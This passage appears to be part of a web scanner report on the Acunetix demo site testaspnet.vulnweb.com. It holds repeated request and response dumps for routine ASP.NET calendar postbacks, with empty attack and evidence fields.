08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8502&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA8tvoOtsIZGRkFJ2qA%2Fa3iol39l4X0kvLUo%2F07PA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKNppaDCQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JtPTC3nFln5JYfM7NByCbtcBZw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:50 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDA8tvoOtsIZGRkFJ2qA/a3iol39l4X0kvLUo/07PA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKNppaDCQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwe5JtPTC3nFln5JYfM7NByCbtcBZw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:White" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8494&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDApIifNNsIZGRk9CTFLsqFcJJeAzpJfE3IWAxvuY4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLJyqi9CQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweRdQXh0Y8Vp7VaEnwlAMaNAGQLQw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:31 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDApIifNNsIZGRk9CTFLsqFcJJeAzpJfE3IWAxvuY4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLJyqi9CQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlweRdQXh0Y8Vp7VaEnwlAMaNAGQLQw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:White" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" 